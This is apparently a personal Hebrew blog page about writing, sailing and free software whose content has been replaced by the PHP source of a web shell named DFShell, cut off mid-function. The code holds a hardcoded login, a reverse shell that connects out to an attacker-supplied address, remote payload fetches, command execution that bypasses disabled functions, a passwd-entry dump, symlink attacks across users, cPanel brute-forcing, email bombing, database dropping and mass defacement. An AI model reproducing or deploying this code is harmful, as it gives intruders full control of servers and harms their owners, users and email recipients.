תמונה שלי

הבלוג של אורי עידן

כתיבה, שייט תוכנה חופשית ומה שבינהם


array('pipe', 'r'), // shell can read from STDIN 1 => array('pipe', 'w'), // shell can write to STDOUT 2 => array('pipe', 'w') // shell can write to STDERR ); private $buffer = 1024; private $clen = 0; private $error = false; static protected $pass = "OI2lo2eG+xkgYPhmurVfWAsDHBx31O1qAoH2J2LkX7c="; //DF_Malaysia@1337$ static protected $remote_url = "https://raw.githubusercontent.com/EagleTube/DFS/main/contents"; public function __construct(){ $_SESSION['latest'] = $GLOBALS['DFSyntax'][0](self::$remote_url . "/version.txt"); $_SESSION['need_update'] = false; if(doubleval($_SESSION['latest'])!==$GLOBALS['DFShell_Ver']){ $_SESSION['need_update'] = true; } } public function DFSPopupMSG($no,$title,$msg,$foot,$x){ if($x){ $location = "window.location.replace(window.location.href)"; }else{ $location = "window.history.back()"; } if(isset($GLOBALS['DFConfig'][0]['dfp']) && isset($GLOBALS['DFConfig'][0]['dff'])){ $slocation = "window.location.replace('?dfp=".$GLOBALS['DFConfig'][0]['dfp']."')"; }else{ $slocation = "window.location.replace('".$GLOBALS['DFConfig'][2]['PHP_SELF']."')"; } switch($no){ case 1: $script = ""; print($script); break; case 2: $script = ""; print($script); break; case 3: $script = ""; print($script); break; case 4: $script = ""; print($script); break; case 5: $script = ""; print($script); break; } } function __call($method, $arg){ if(isset($method) && isset($arg)){ $arg[0]($arg[1]); //upcoming CNC ddos } } private function triggered(){ print("Place where magic happend!"); } public function Enc() { $this->iv_length = openssl_cipher_iv_length($this->ciphering); $this->output = openssl_encrypt($this->string,$this->ciphering,sha1($this->keys),$this->options,$this->iv); return $this->output; } public function Dec($enc) { $this->output = openssl_decrypt($enc,$this->ciphering,sha1($this->keys),$this->options,$this->iv); return $this->output; } public function DFSLogin($password){ $login_pass = $this->Dec(urldecode($password)); if($login_pass === $this->Dec(self::$pass)){ $_SESSION['DFS_Auth']=sha1($GLOBALS['DFConfig'][2]['REMOTE_ADDR']); setrawcookie('DFSVersion',$GLOBALS['DFShell_Ver'],(time()+18000),'/',$GLOBALS['DFConfig'][2]['HTTP_HOST'],1,1); return true; }else{ echo ""; //echo $login_pass; return false; } } public function DFSSlash(){ if($GLOBALS['DFSPlatform']!=='win'){ $slashtype = "/"; }else{ $slashtype = "\"; } return $slashtype; } public function DFSFormat($bytes) { if ($bytes >= 1073741824) { $bytes = number_format($bytes / 1073741824, 2) . ' GB'; } elseif ($bytes >= 1048576) { $bytes = number_format($bytes / 1048576, 2) . ' MB'; } elseif ($bytes >= 1024) { $bytes = number_format($bytes / 1024, 2) . ' KB'; } elseif ($bytes > 1) { $bytes = $bytes . ' B'; } else { $bytes = '0 bytes'; } return $bytes; } ########## REVERSHELL> CREDIT : https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell.php ######### private function rw($input, $output, $iname, $oname) { while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) { if ($GLOBALS['DFSPlatform'] === 'WINDOWS' && $oname === 'STDIN') { $this->clen += strlen($data); } } } private function brw($input, $output, $iname, $oname) { $fstat = fstat($input); $size = $fstat['size']; if ($GLOBALS['DFSPlatform'] === 'lin' && $iname === 'STDOUT' && $this->clen) { while ($this->clen > 0 && ($bytes = $this->clen >= $this->buffer ? $this->buffer : $this->clen) && $this->read($input, $iname, $bytes)) { $this->clen -= $bytes; $size -= $bytes; } } while ($size > 0 && ($bytes = $size >= $this->buffer ? $this->buffer : $size) && ($data = $this->read($input, $iname, $bytes)) && $this->write($output, $oname, $data)) { $size -= $bytes; } } private function read($stream, $name, $buffer) { if (($data = @fread($stream, $buffer)) === false) { $this->error = true; echo "
STRM_ERROR: Cannot read from {$name}, script will now exit...
"; } return $data; } private function write($stream, $name, $data) { if (($bytes = @fwrite($stream, $data)) === false) { $this->error = true; echo "
STRM_ERROR: Cannot write to {$name}, script will now exit...
"; } return $bytes; } public function DFSReverse($ip,$port){ $exit = false; if($GLOBALS['DFSPlatform']!=='lin'){ $exec = 'cmd.exe'; }else{ $exec = '/bin/sh'; } if (!$GLOBALS['DFSyntax'][5]('pcntl_fork')) { echo "DAEMONIZE: pcntl_fork() does not exists, moving on..."; } else if (($pid = @$GLOBALS['DFSyntax'][7]()) < 0) { echo "DAEMONIZE: Cannot fork off the parent process, moving on..."; } else if ($pid > 0) { $exit = true; echo "DAEMONIZE: Child process forked off successfully, parent process will now exit..."; } else if ($GLOBALS['DFSyntax'][12]() < 0) { echo "DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan..."; } else { echo "DAEMONIZE: Completed successfully!"; } if(!$exit){ @set_time_limit(0); @umask(0); $socket = @$GLOBALS['DFSyntax'][6]($ip, $port, $errno, $errstr, 30); if(!$socket){ echo "Erro Socket! -> {$errno}: {$errstr}"; }else{ $GLOBALS['DFSyntax'][8]($socket, false); $process = @$GLOBALS['DFSyntax'][10]($exec, $this->descriptorspec, $pipes, null, null); if (!$process) { echo "PROC_ERROR: Cannot start the shell"; }else{ foreach ($pipes as $pipe) { $GLOBALS['DFSyntax'][8]($pipe, false); } $status = $GLOBALS['DFSyntax'][9]($process); @fwrite($socket, "SOCKET: Shell has connected! PID: {$status['pid']}"); do { $status = $GLOBALS['DFSyntax'][9]($process); if (feof($socket)) { echo "SOC_ERROR: Shell connection has been terminated"; break; } else if (feof($pipes[1]) || !$status['running']) { echo "PROC_ERROR: Shell process has been terminated"; break; } $streams = array( 'read' => array($socket, $pipes[1], $pipes[2]), // SOCKET | STDOUT | STDERR 'write' => null, 'except' => null ); $num_changed_streams = @$GLOBALS['DFSyntax'][13]($streams['read'], $streams['write'], $streams['except'], 0); if ($num_changed_streams === false) { echo "STRM_ERROR: stream_select() failed"; break; } else if ($num_changed_streams > 0) { if ($GLOBALS['DFSPlatform'] === 'lin') { if (in_array($socket , $streams['read'])) { $this->rw($socket , $pipes[0], 'SOCKET', 'STDIN' ); } if (in_array($pipes[2], $streams['read'])) { $this->rw($pipes[2], $socket , 'STDERR', 'SOCKET'); } if (in_array($pipes[1], $streams['read'])) { $this->rw($pipes[1], $socket , 'STDOUT', 'SOCKET'); } } else if ($GLOBALS['DFSPlatform'] === 'win') { if (in_array($socket, $streams['read'])/*------*/) { $this->rw ($socket , $pipes[0], 'SOCKET', 'STDIN' ); } if (($fstat = fstat($pipes[2])) && $fstat['size']) { $this->brw($pipes[2], $socket , 'STDERR', 'SOCKET'); } if (($fstat = fstat($pipes[1])) && $fstat['size']) { $this->brw($pipes[1], $socket , 'STDOUT', 'SOCKET'); } } } } while (!$this->error); foreach ($pipes as $pipe) { fclose($pipe); } $GLOBALS['DFSyntax'][11]($process); } fclose($socket); } } } ####### END REVERSHELL ######## public function DFSAction($action){ switch(strtolower($action)){ case "download": $slashtype = $this->DFSSlash(); $pathfile = $this->Dec(($this->query[0])) . $this->Dec(($this->query[1])); $pathfile = $this->Dec($this->DFSDirFilter($pathfile)); if( file_exists($pathfile) ){ $type = mime_content_type($pathfile) ?: 'text/plain'; header("Content-Type: ".$type); header('Content-Description: File Transfer'); header("Content-Length: ".filesize($pathfile)); header('Content-Disposition: attachment; filename="'.basename($pathfile).'"'); $GLOBALS['DFSyntax'][2]($pathfile); }else{ echo ""; } break; case "chmd": $slashtype = $this->DFSSlash(); $this->DFSCurrent($slashtype); if(isset($this->query)){ $dirmod = $this->Dec($this->query[0]); $filmod = ""; if(isset($this->query[1])){ $filmod = $this->Dec($this->query[1]); } $_cmod = $this->DFSMod(fileperms($dirmod . $filmod)); echo "

Location : $dirmod$filmod

"; echo "
"; if(isset($GLOBALS['DFConfig'][1]['cmod'])){ if($this->DFSChange($dirmod . $filmod,$GLOBALS['DFConfig'][1]['modf'])){ echo ""; }else{ echo ""; } } } break; case "bombing": echo "

Email Bombing

"; if(isset($GLOBALS['DFConfig'][1]['mail_list']) && isset($GLOBALS['DFConfig'][1]['mail_text'])){ $emails = explode("",$GLOBALS['DFConfig'][1]['mail_list']); $message = $GLOBALS['DFConfig'][1]['mail_text']; $subject = $GLOBALS['DFConfig'][1]['mail_subject']; $headers = "From: ".$GLOBALS['DFConfig'][2]['SERVER_ADMIN']; foreach($emails as $email){ $email = preg_replace("/s+/i","",$email); if(@mail($email,$subject,$message,$headers)){ print("Email sent -> ".$email."
"); }else{ print("Failed -> ".$email."
"); } } } echo "
"; break; case "massdel": //upcoming if(isset($GLOBALS['DFConfig'][1]['selectAction'])){ if($GLOBALS['DFConfig'][1]['selectAction']==="Delete") if(!empty($GLOBALS['DFConfig'][1]['toZip'])){ if(isset($GLOBALS['DFConfig'][0]['dfp'])){ $delPath = $this->Dec($GLOBALS['DFConfig'][0]['dfp']) . $slashtype; }else{ $delPath = ""; } $toDel = $GLOBALS['DFConfig'][1]['toZip']; for($i=0;$iDec(urldecode($mdel[0])); $mdel_item = $this->Dec(urldecode($mdel[1])); if(file_exists($mdel_dir . $mdel_item)){ if(is_dir($mdel_dir . $mdel_item)){ @rmdir($mdel_dir . $mdel_item); } if(is_file($mdel_dir . $mdel_item)){ @unlink($mdel_dir . $mdel_item); } } } $this->DFSPopupMSG(3,null,"Selected file deleted!",null,true); }else{ $this->DFSPopupMSG(4,null,"No file deleted!",null,true); } } break; case "zipping": $ziproc = new ZipArchive; $slashtype = $this->DFSSlash(); if(isset($GLOBALS['DFConfig'][1]['selectAction'])){ if($GLOBALS['DFConfig'][1]['selectAction']==="Zip") if(empty($GLOBALS['DFConfig'][1]['toZip'])){ print(""); }else{ $toZip = $GLOBALS['DFConfig'][1]['toZip']; $zipXname = md5(time()) . ".zip"; if(isset($GLOBALS['DFConfig'][0]['dfp'])){ $zipdirname = $this->Dec($GLOBALS['DFConfig'][0]['dfp']) . $slashtype . $zipXname; }else{ $zipdirname = $zipXname; } if($ziproc -> open($zipdirname, ZipArchive::CREATE | ZipArchive::OVERWRITE)){ for($i=0;$iDec(urldecode($mzip[0])) . $slashtype; $recdir = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($dirtozip), RecursiveIteratorIterator::LEAVES_ONLY ); foreach ($recdir as $name => $file) { if (!$file->isDir()) { $filePath = $file->getRealPath(); $relativePath = substr($filePath, strlen($dirtozip)); $ziproc->addFile($filePath, $relativePath); } } }else{ $filetozip = $this->Dec(urldecode($mzip[0])) . $slashtype . $this->Dec(urldecode($mzip[1])); $ziproc->addFile($filetozip,$this->Dec(urldecode($mzip[1]))); } } echo ""; $ziproc ->close(); } } } break; case "upload": $slashtype = $this->DFSSlash(); if(!isset($this->query[0])){ $path = getcwd() . $slashtype; }else{ $path = $this->Dec(($this->query[0])) ?: getcwd() . $slashtype; } $path = $this->Dec($this->DFSDirFilter($path)) . $slashtype; if(isset($GLOBALS['DFConfig'][1]['dfupload'])){ if(move_uploaded_file($GLOBALS['DFConfig'][4]['dffile']['tmp_name'],$path.$GLOBALS['DFConfig'][4]['dffile']['name'])){ $this->DFSPopupMSG(3,null,"File uploaded!",null,true); }else{ $this->DFSPopupMSG(4,null,"Permission denied!",null,true); } } break; case "dest": $slashtype = $this->DFSSlash(); if(!isset($GLOBALS['DFConfig'][1]['destroy'])){ echo "
"; echo "
"; }else{ $DFS_SHELL = $GLOBALS['DFConfig'][2]['DOCUMENT_ROOT'] . $slashtype . $GLOBALS['DFConfig'][2]['PHP_SELF']; if(unlink($DFS_SHELL)){ $this->DFSPopupMSG(3,null,"File destroyed!!",null,false); }else{ $this->DFSPopupMSG(4,null,"Unable destroyed!!",null,true); } } break; case "edit": $slashtype = $this->DFSSlash(); $this->DFSCurrent($slashtype); $pathfile = $this->Dec(($this->query[0])) . $this->Dec(($this->query[1])); $pathfile = $this->Dec($this->DFSDirFilter($pathfile)); if(!isset($GLOBALS['DFConfig'][1]['dfedit'])){ echo "
"; echo "
"; echo ""; echo ""; echo "
"; }else{ $pto = fopen($pathfile,'w'); fwrite($pto,$GLOBALS['DFConfig'][1]['editx']); fclose($pto); $this->DFSPopupMSG(3,null,"Saved!",null,true); } break; case "view": $slashtype = $this->DFSSlash(); $this->DFSCurrent($slashtype); $pathfile = $this->Dec(($this->query[0])) . $this->Dec(($this->query[1])); $pathfile = $this->Dec($this->DFSDirFilter($pathfile)); echo "

Filename -> ".$this->Dec(($this->query[1]))."

"; echo "
"; show_source($pathfile); echo "
"; break; case "mkfile": $slashtype = $this->DFSSlash(); if(isset($GLOBALS['DFConfig'][1]['createfile'])){ $fname = $GLOBALS['DFConfig'][1]['newfile'] ?: 'newfile.txt'; $fcreate = fopen($this->Dec(($this->query[0])).$slashtype.$fname,'w'); fwrite($fcreate,""); fclose($fcreate); $this->DFSPopupMSG(3,null,"File created!",null,true); } break; case "mkdir": $slashtype = $this->DFSSlash(); if(isset($GLOBALS['DFConfig'][1]['createfolder'])){ $fname = $GLOBALS['DFConfig'][1]['newfolder'] ?: 'newfolder'; if(!file_exists($fname)){ if(mkdir($this->Dec(($this->query[0])).$slashtype.$fname)){ $this->DFSPopupMSG(3,null,"Folder created!",null,true); }else{ $this->DFSPopupMSG(4,null,"Permission denied!",null,true); } }else{ $this->DFSPopupMSG(4,null,"Folder existed!",null,true); } } break; case "cmd": $slashtype = $this->DFSSlash(); $this->DFSCurrent($slashtype); echo "
"; echo "

"; echo "
"; break; case "sym": echo "
"; echo ""; echo "
"; echo ""; echo ""; echo ""; echo "
"; if(isset($GLOBALS['DFConfig'][1]['dfssym'])){ if($GLOBALS['DFSPlatform']!=='win'){ if(!file_exists('sym')) { mkdir($GLOBALS['DFConfig'][1]['path'].'/sym'); } $contents = $GLOBALS['DFSyntax'][0](self::$remote_url . "/htaccess.txt"); for ($uid = 0; $uid < 4000; $uid++){ $nothing = posix_getpwuid($uid); if (!empty($nothing)){ if(!file_exists($GLOBALS['DFConfig'][1]['path'].'/sym/'.$nothing['name'])){ mkdir($GLOBALS['DFConfig'][1]['path'].'/sym/'.$nothing['name']); $targetpath = $this->DFSRender('/%{user}%/i',$nothing['name'],base64_decode(urldecode($GLOBALS['DFConfig'][1]['target']))); if(isset($targetpath)){ $this->DFSExecute("ln -s ".$targetpath.' '.$GLOBALS['DFConfig'][1]['path'].'/sym/'.$nothing['name'].'/'.$GLOBALS['DFConfig'][1]['dfsaved']); symlink($targetpath, $GLOBALS['DFConfig'][1]['path'].'/sym/'.$nothing['name'].'/'.$GLOBALS['DFConfig'][1]['dfsaved']); $user_ht = fopen($GLOBALS['DFConfig'][1]['path'].'/sym/'.$nothing['name'].'/.htaccess','w'); fwrite($user_ht,$this->DFSRender('/%{user}%/i',$GLOBALS['DFConfig'][1]['dfsaved'],$contents)); fclose($user_ht); $dfsv = urlencode($GLOBALS['DFConfig'][1]['path'].'/sym/'.$nothing['name'].'/'.$GLOBALS['DFConfig'][1]['dfsaved']); print("Done! -> ".$nothing['name']." -> Open
"); } }else{ $targetpath = $this->DFSRender('/%{user}%/i',$nothing['name'],base64_decode(urldecode($GLOBALS['DFConfig'][1]['target']))); if(isset($targetpath)){ $this->DFSExecute("ln -s ".$targetpath.' '.$GLOBALS['DFConfig'][1]['path'].'/sym/'.$nothing['name'].'/'.$GLOBALS['DFConfig'][1]['dfsaved']); symlink($targetpath, $GLOBALS['DFConfig'][1]['path'].'/sym/'.$nothing['name'].'/'.$GLOBALS['DFConfig'][1]['dfsaved']); $user_ht = fopen($GLOBALS['DFConfig'][1]['path'].'/sym/'.$nothing['name'].'/.htaccess','w'); fwrite($user_ht,$this->DFSRender('/%{user}%/i',$GLOBALS['DFConfig'][1]['dfsaved'],$contents)); fclose($user_ht); $dfsv = urlencode($GLOBALS['DFConfig'][1]['path'].'/sym/'.$nothing['name'].'/'.$GLOBALS['DFConfig'][1]['dfsaved']); print("Done! -> ".$nothing['name']." -> Open
"); } } } } }else{ echo "
Not work in window!
"; } } echo "
"; break; case "reverse": $revhtml = explode('||',$GLOBALS['DFSyntax'][0](self::$remote_url.'/others.html'))[1]; echo "
"; if(!isset($GLOBALS['DFConfig'][1]['dfsrev'])){ echo $revhtml; }else{ echo $revhtml; echo ""; $addr = trim($GLOBALS['DFConfig'][1]['dfsaddr']); $port = trim($GLOBALS['DFConfig'][1]['dfsport']); $this->DFSReverse($addr,$port); echo ""; } echo "
"; break; case "conf": echo "
"; $pwid = array(); if($GLOBALS['DFSPlatform']!=='win'){ for ($uid = 0; $uid < 4000; $uid++){ $nothing = posix_getpwuid($uid); if (!empty($nothing)){ array_push($pwid,$nothing['name'].':'.$nothing['passwd'].':'.$nothing['uid'].':'.$nothing['gid'].':'.$nothing['dir'].':'.$nothing['shell']); } } foreach($pwid as $conf){ print($conf."
"); } }else{ echo "
Not work in window!
"; } echo "
"; break; case "unzip": $from = $this->Dec($GLOBALS['DFConfig'][0]['dfp']); $zipp = $this->Dec($GLOBALS['DFConfig'][0]['dff']); echo "
"; if(isset($GLOBALS['DFConfig'][1]['destination'])){ $ziproc = new ZipArchive; $pth = $from.$zipp; if ($ziproc->open($pth) === TRUE) { // Unzip Path $ziproc->extractTo($GLOBALS['DFConfig'][1]['destination']); $ziproc->close(); $this->DFSPopupMSG(3,null,"File successfully extracted to destination!",null,false); } else { $this->DFSPopupMSG(4,null,"Failed to extract into destination!",null,false); } }else{ echo "
Filename : ".$from.$zipp.""; echo ""; echo ""; echo "
"; } echo "
"; break; case "scand": $slashtype = $this->DFSSlash(); $path = $this->Dec(($this->query[0])). $slashtype; $path = $this->Dec($this->DFSDirFilter($path)); $this->DFSCurrent($slashtype); echo "
"; echo ""; $folder = array_diff(scandir($path),['.','..']); $files = scandir($path); foreach($folder as $p){ if(is_dir($path . $slashtype . $p)){ $filtered = $this->Dec($this->DFSDirFilter($path)); $this->string = $filtered . $p; $uid = explode(':',$this->DFSOG($filtered.$slashtype.$p)); //$og = posix_getpwuid($uid[0]); echo "

"; echo ""; echo ""; echo ""; echo ""; echo ""; echo "

"; } } foreach($files as $p){ if(is_file($path . $slashtype . $p)){ $filtered = $this->Dec($this->DFSDirFilter($path)); $this->string = $filtered; $dfp = $this->Enc(); $this->string = $p; $dff = $this->Enc(); $compressed = array("zip","tar","gz","rar"); $isZip = pathinfo($p,PATHINFO_EXTENSION); if(in_array($isZip,$compressed)){ $tname = $p . ""; }else{ $tname = $p; } echo "

"; echo ""; echo ""; echo ""; echo ""; echo ""; echo "

"; } } echo "
$p".$this->DFSOG($filtered . $slashtype . $p)."".$this->DFSPerms($filtered . $slashtype . $p)."".date("h:i:sA(d/m/Y)",filemtime($filtered . $slashtype . $p))." .
$tname".$this->DFSFormat(filesize($filtered.$p))."".$this->DFSOG($filtered.$p)."".$this->DFSPerms($filtered.$p)."".date("h:i:sA(d/m/Y)",filemtime($filtered.$p))." . . .
"; break; case "del": $slashtype = $this->DFSSlash(); $pathfile = $this->Dec(($this->query[0])) . $this->Dec(($this->query[1]?:'')); $pathfile = $this->Dec($this->DFSDirFilter($pathfile)); if(is_file($pathfile)){ if(unlink($pathfile)){ $this->DFSPopupMSG(3,null,"File Successfully deleted!",null,false); }else{ $this->DFSPopupMSG(4,null,"Permission denied!",null,false); } }else if(is_dir($pathfile)){ if(rmdir($pathfile)){ $this->DFSPopupMSG(3,null,"Directory Successfully deleted!",null,false); }else{ $this->DFSPopupMSG(4,null,"Permission denied!",null,false); } } break; case "ren": $slashtype = $this->DFSSlash(); $pathfile = $this->Dec(($this->query[0])) . $this->Dec(($this->query[1])); $pathfile = $this->Dec($this->DFSDirFilter($pathfile)); if(getcwd()==$pathfile){ $GLOBALS['DFSyntax'][3]($GLOBALS['DFConfig'][2]['DOCUMENT_ROOT']); } echo "
"; if(isset($GLOBALS['DFConfig'][1]['newfile'])){ if(file_exists($pathfile)){ $dfsRen = preg_replace("/".basename($pathfile)."/i",$GLOBALS['DFConfig'][1]['newfile'],$pathfile); if(rename($pathfile,$dfsRen)){ $this->DFSPopupMSG(5,"","File successfully renamed!","",true); echo ""; }else{ $this->DFSPopupMSG(4,null,"Permission denied!",null,true); } }else{ $this->DFSPopupMSG(4,null,"No such file/directory!",null,true); } }else{ $dfsren = preg_replace("/".basename($pathfile)."/i","",$pathfile); $this->string = $dfsren; echo "
"; } echo "
"; break; case "sql": echo "
"; if(isset($_SESSION['sql_auth'])){ $sqldat = explode('|--|',$_SESSION['sql_auth']); $conn = mysqli_connect($sqldat[0],$sqldat[1],$sqldat[2]); if(isset($GLOBALS['DFConfig'][1]['other'])){ $this->DFSPopupMSG(1,"Get Adminer","Please get adminer from link below","Adminer",true); }else if(isset($GLOBALS['DFConfig'][1]['sqldrop'])){ $ftar = array("'",'"'); if(!isset($GLOBALS['DFConfig'][0]['tbname'])){ mysqli_select_db($conn,$GLOBALS['DFConfig'][0]['dbname']); $dropping = str_replace($ftar,"",$GLOBALS['DFConfig'][0]['dbname']); $dropsql = "DROP DATABASE $dropping"; $query = mysqli_query($conn,$dropsql) or exit(mysqli_error($conn)); $this->DFSPopupMSG(3,null,"Database DROPPED!",null,false); }else{ mysqli_select_db($conn,$GLOBALS['DFConfig'][0]['dbname']); $dropping = str_replace($ftar,"",$GLOBALS['DFConfig'][0]['tbname']); $dropsql = "DROP TABLE $dropping"; $query = mysqli_query($conn,$dropsql) or exit(mysqli_error($conn)); $this->DFSPopupMSG(3,null,"Table DROPPED!",null,false); } }else if(isset($GLOBALS['DFConfig'][1]['sqlcommands'])){ if(isset($GLOBALS['DFConfig'][0]['dbname'])){ mysqli_select_db($conn,$GLOBALS['DFConfig'][0]['dbname']); $inject = $GLOBALS['DFConfig'][1]['sqlcommands']; $query = mysqli_query($conn,$inject) or exit(mysqli_error($conn)); $this->DFSPopupMSG(3,null,"Command executed!",null,false); }else{ $inject = $GLOBALS['DFConfig'][1]['sqlcommands']; $query = mysqli_query($conn,$inject) or exit(mysqli_error($conn)); $this->DFSPopupMSG(3,null,"Command executed!",null,false); } }else{ echo "
"; if(isset($GLOBALS['DFConfig'][0]['tbname']) || isset($GLOBALS['DFConfig'][0]['dbname'])){ echo "
"; } echo "
"; echo "

"; if(!isset($GLOBALS['DFConfig'][0]['dbname'])){ echo "
"; }else{ if(!isset($GLOBALS['DFConfig'][0]['tbname'])){ echo "
"; }else{ echo "
"; } } if(isset($GLOBALS['DFConfig'][0]['dbname'])){ $dbs = mysqli_real_escape_string($conn,$GLOBALS['DFConfig'][0]['dbname']); $sql = "select table_name from information_schema.tables where table_schema='$dbs';"; $query = mysqli_query($conn,$sql) or exit(mysqli_error($conn)); while($fetch = mysqli_fetch_assoc($query)){ echo "". $fetch['table_name'] . "
"; } echo "
"; if(isset($GLOBALS['DFConfig'][0]['tbname'])){ if(!isset($GLOBALS['DFConfig'][0]['limit'])){ mysqli_select_db($conn,$dbs); $tbl = mysqli_real_escape_string($conn,$GLOBALS['DFConfig'][0]['tbname']); $sql = "select column_name from information_schema.columns where table_name='$tbl'"; $sql1 = "select * from $tbl limit 20"; $query = mysqli_query($conn,$sql) or exit(mysqli_error($conn)); $query1 = mysqli_query($conn,$sql1) or exit(mysqli_error($conn)); echo ""; while($fetch=mysqli_fetch_assoc($query)){ echo ""; } while($fetch1=mysqli_fetch_assoc($query1)){ echo ""; foreach($fetch1 as $key => $val){ echo ""; } echo ""; } $total_row=mysqli_num_rows($query1); echo "
"; if($total_row>0){ echo "
"; echo ""; echo ""; echo ""; echo ""; echo "
"; } echo "
"; }else{ $limits = explode(',',$GLOBALS['DFConfig'][0]['limit']); $offset = intval($limits[0]); $limit = intval($limits[1]); mysqli_select_db($conn,$dbs); $tbl = mysqli_real_escape_string($conn,$GLOBALS['DFConfig'][0]['tbname']); $sql = "select column_name from information_schema.columns where table_name='$tbl'"; $sql1 = "select * from $tbl limit $offset,$limit"; $query = mysqli_query($conn,$sql) or exit(mysqli_error($conn)); $query1 = mysqli_query($conn,$sql1) or exit(mysqli_error($conn)); echo ""; while($fetch=mysqli_fetch_assoc($query)){ echo ""; } while($fetch1=mysqli_fetch_assoc($query1)){ echo ""; foreach($fetch1 as $key => $val){ echo ""; } echo ""; } echo "
"; $total_row=mysqli_num_rows($query1); if($total_row>0){ echo "
"; echo ""; echo ""; echo ""; echo ""; echo "
"; } echo"
"; } } }else{ $sql = "select schema_name from information_schema.schemata"; $query = mysqli_query($conn,$sql) or exit(mysqli_error($conn)); while($fetch = mysqli_fetch_assoc($query)){ echo "". $fetch['schema_name'] . "
"; } echo "
"; } if(isset($GLOBALS['DFConfig'][1]['sqllogout'])){ $_SESSION['sql_auth'] = null; unset($_SESSION['sql_auth']); echo ""; } if(isset($GLOBALS['DFConfig'][1]['sqlcmd'])){ $sqlcmd = $GLOBALS['DFConfig'][1]['sqlcmd']; $qrycmd = mysqli_query($conn,$sqlcmd) or exit(mysqli_error($conn)); $this->DFSPopupMSG(1,"SQL Query","Command successfully executed!","",true); } } }else{ if(!isset($GLOBALS['DFConfig'][1]['connect_sql'])){ echo explode('||',$GLOBALS['DFSyntax'][0](self::$remote_url.'/others.html'))[4]; }else{ $tmp_conn = mysqli_connect($GLOBALS['DFConfig'][1]['sqlhost'],$GLOBALS['DFConfig'][1]['sqluser'],$GLOBALS['DFConfig'][1]['sqlpass']) or exit($this->DFSPopupMSG(2,"MySQL Connection","Cannot connect to database!","",true)); if(!mysqli_connect_errno()){ $_SESSION['sql_auth'] = $GLOBALS['DFConfig'][1]['sqlhost']."|--|".$GLOBALS['DFConfig'][1]['sqluser']."|--|".$GLOBALS['DFConfig'][1]['sqlpass']; echo ""; }else{ echo "Failed to connect mysql"; exit; } } } echo ""; break; case "logout": unset($_SESSION['DFS_Auth']); session_destroy(); echo ""; break; case "crack": if(!isset($GLOBALS['DFConfig'][1]['crack'])){ echo explode('||',$GLOBALS['DFSyntax'][0](self::$remote_url.'/others.html'))[0]; }else{ $host = $GLOBALS['DFConfig'][1]['host']; $user = explode("",$GLOBALS['DFConfig'][1]['userlist']); $pass = explode("",$GLOBALS['DFConfig'][1]['passlist']); $port = $GLOBALS['DFConfig'][1]['portc']; $timeout = $GLOBALS['DFConfig'][1]['timeout']; echo "
"; foreach($user as $u){ print("

Trying for user -> ".$u."

"); foreach($pass as $p){ $this->DFSCracker(trim($host),$port,trim($u),trim($p),trim($timeout)); } } echo "


"; echo "
"; } break; case "mass": $slashtype = $this->DFSSlash(); echo "
"; if(!isset($GLOBALS['DFConfig'][1]['dfmass'])){ echo explode('||',$GLOBALS['DFSyntax'][0](self::$remote_url.'/others.html'))[2]; }else{ $arrpath = glob($GLOBALS['DFConfig'][1]['masspath'] . $slashtype . '*', GLOB_ONLYDIR); if(!empty($GLOBALS['DFConfig'][1]['fromurl']) && $GLOBALS['DFConfig'][1]['fromurl']!=="" && $GLOBALS['DFConfig'][1]['fromurl']!==NULL){ if(filter_var($GLOBALS['DFConfig'][1]['fromurl'], FILTER_VALIDATE_URL)){ $ncode = file_get_contents($GLOBALS['DFConfig'][1]['fromurl']); }else{ die(""); } }else{ $ncode = $GLOBALS['DFConfig'][1]['codemass'] ?: 'Hacked by Eagle Eye'; } $lekluh = $GLOBALS['DFConfig'][1]['masspath'] . $slashtype . $GLOBALS['DFConfig'][1]['massname']; $rakluh = fopen($lekluh,'w'); fwrite($rakluh,$ncode); foreach($arrpath as $p){ $npath = $p . $slashtype . $GLOBALS['DFConfig'][1]['massname']; $nopen = fopen($npath,'w'); fwrite($nopen,$ncode); fclose($nopen); } fclose($rakluh); $this->DFSPopupMSG(1,"Mass defacements","All file successfully created!","",true); } echo "
"; break; } } public function DFSExecute($command){ if(isset($GLOBALS['DFConfig'][0]['dfp'])){ $GLOBALS['DFSyntax'][3]($this->Dec($GLOBALS['DFConfig'][0]['dfp'])); }else{ $GLOBALS['DFSyntax'][3]($GLOBALS['DFConfig'][2]['DOCUMENT_ROOT']); } if($this->DFSDat('ini','disable_functions')!=="None"){ $disCMD = explode(",",$this->DFSDat('ini','disable_functions')); $disCMD = array_map('trim', $disCMD); foreach($GLOBALS['DFSCmd'] as $cmd){ if(!in_array($cmd,$disCMD)){ $availCMD = $cmd; switch($availCMD){ case $GLOBALS['DFSCmd'][4]: return $this->DFSProcOpen($command); break; case $GLOBALS['DFSCmd'][1]: case $GLOBALS['DFSCmd'][2]: print($availCMD($command)); return $GLOBALS['DFSCmd'][1]($command); break; default: return $availCMD($command); break; } break; } } }else{ return system($command); } } private function DFSProcOpen($command){ $descriptorspec = array( 0 => array('pipe', 'r'), // shell can read from STDIN 1 => array('pipe', 'w'), // shell can write to STDOUT 2 => array('pipe', 'w') // shell can write to STDERR ); $exec = $command; $process = $GLOBALS['DFSCmd'][4]($exec, $descriptorspec, $pipes, null, null); if(is_resource($process)){ $retCMD = $GLOBALS['DFSyntax'][14]($pipes[1]); echo $retCMD; proc_close($process); }else{ echo "Fail to execute!"; } } private function DFSWinPathCheck(){ $partition = array("A:","B:","C:","D:","E:","F:","G:","H:","I:","J:","K:","L:","M:", "N:","O:","P:","Q:","R:","S:","T:","U:","V:","W:","X:","Y:","Z:"); $available = array(); foreach($partition as $part){ if(is_dir($part)){ array_push($available,$part); } } return $available; } private function DFSCracker($host,$port,$user,$pass,$timeout){ $ch = curl_init(); $qdata = array( 'user'=>$user, 'pass'=>$pass, 'goto_uri'=>'/' ); curl_setopt($ch, CURLOPT_URL, "https://$host:" . $port . "/login/?login_only=1"); curl_setopt($ch, CURLOPT_HEADER, TRUE); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $qdata); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($ch, CURLOPT_FAILONERROR, 1); $data = curl_exec($ch); $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE); if ( curl_errno($ch) == 28 ) { print " Error : Connection Timeout , Sleep for 5s .

